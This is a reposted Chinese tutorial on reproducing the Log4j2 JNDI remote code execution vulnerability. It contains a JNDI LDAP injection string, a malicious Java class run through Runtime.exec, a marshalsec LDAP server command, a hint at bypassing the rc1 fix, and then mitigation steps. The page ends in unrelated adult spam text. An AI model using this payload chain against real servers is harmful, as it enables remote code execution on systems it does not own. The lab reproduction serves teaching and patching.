1. 手把手教你復(fù)現(xiàn)Log4j2漏洞,千萬別中招!

        共 339字,需瀏覽 1分鐘

         ·

        2021-12-18 11:19

        點(diǎn)擊關(guān)注公眾號,實(shí)用技術(shù)文章及時了解

        來源:blog.csdn.net/qq_40989258/article/

        details/121862363

        0x00 簡介

        ApacheLog4j2是一個開源的Java日志框架,被廣泛地應(yīng)用在中間件、開發(fā)框架與Web應(yīng)用中。

        0x01 漏洞概述

        該漏洞是由于Apache Log4j2某些功能存在遞歸解析功能,未經(jīng)身份驗(yàn)證的攻擊者通過發(fā)送特定惡意數(shù)據(jù)包,可在目標(biāo)服務(wù)器上執(zhí)行任意代碼。

        0x02 影響范圍

        Apache Log4j 2.x <= 2.15.0-rc1

        0x03 環(huán)境搭建

        創(chuàng)建一個新的maven項(xiàng)目,并導(dǎo)入Log4j的依賴包

        <dependency>
        ????<groupId>org.apache.logging.log4jgroupId>
        ????<artifactId>log4j-coreartifactId>
        ????<version>2.14.1version>
        dependency>

        0x04 漏洞利用

        1、使用POC測試

        import?org.apache.logging.log4j.LogManager;
        import?org.apache.logging.log4j.Logger;
        class?LogTest?{
        ????public?static?final?Logger?logger?=?LogManager.getLogger();
        ????public?static?void?main(String[]?args)?{
        ????????logger.error("${jndi:ldap://localhost:8888/Exploit}");
        ????}
        }

        2、編譯一惡意類Exploit.class

        首先新建exp.java,然后編譯為class文件

        class?Exploit?{
        ????static?{
        ????????System.err.println("Pwned");
        ????????try?{
        ????????????String?cmds?=?"calc";
        ????????????Runtime.getRuntime().exec(cmds);
        ????????}?catch?(?Exception?e?)?{
        ????????????e.printStackTrace();
        ????????}
        ????}
        }

        javac exp.java

        3、使用marshalsec-0.0.3-SNAPSHOT-all.jar本地開啟一個LDAP服務(wù)

        java?-cp?marshalsec-0.0.3-SNAPSHOT-all.jar?marshalsec.jndi.LDAPRefServer
        "http://127.0.0.1:7777/#Exploit"?8888

        4、運(yùn)行poc.java,即可訪問惡意類并執(zhí)行寫在其中的"calc"命令

        結(jié)合一些其它 StrLookup 適當(dāng)變形,以及配合官方測試用例中臟數(shù)據(jù)"?Type=A Type&Name=1100110&Char=!"可繞過rc1,RC2版本對此異常進(jìn)行了捕獲。

        https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2

        0x05 修復(fù)方式

        目前,Apache官方已發(fā)布新版本完成漏洞修復(fù),建議用戶盡快進(jìn)行自查,并及時升級至最新版本:

        https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

        建議同時采用如下臨時措施進(jìn)行漏洞防范:

        1)添加jvm啟動參數(shù)-Dlog4j2.formatMsgNoLookups=true;

        2)在應(yīng)用classpath下添加log4j2.component.properties配置文件,文件內(nèi)容為log4j2.formatMsgNoLookups=true;

        3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

        4)部署使用第三方防火墻產(chǎn)品進(jìn)行安全防護(hù)。


        第3版:互聯(lián)網(wǎng)大廠面試題


        包括 Java 集合、JVM、多線程、并發(fā)編程、設(shè)計模式、算法調(diào)優(yōu)、Spring全家桶、Java、MyBatis、ZooKeeper、Dubbo、Elasticsearch、Memcached、MongoDB、Redis、MySQL、RabbitMQ、Kafka、Linux、Netty、Tomcat、Python、HTML、CSS、Vue、React、JavaScript、Android 大數(shù)據(jù)、阿里巴巴等大廠面試題等、等技術(shù)棧!


        關(guān)注回復(fù):Java?領(lǐng)取

        瀏覽 66
        點(diǎn)贊
        評論
        收藏
        分享

        手機(jī)掃一掃分享

        分享
        舉報
        評論
        圖片
        表情
        推薦
        點(diǎn)贊
        評論
        收藏
        分享

        手機(jī)掃一掃分享

        分享
        舉報
          
          

            1. 婷婷五月天综合色 | 一区二区免费 | 国产又大又粗又硬视频 | 精品青青青在线 | 动漫美女巨乳被吸羞羞视频 |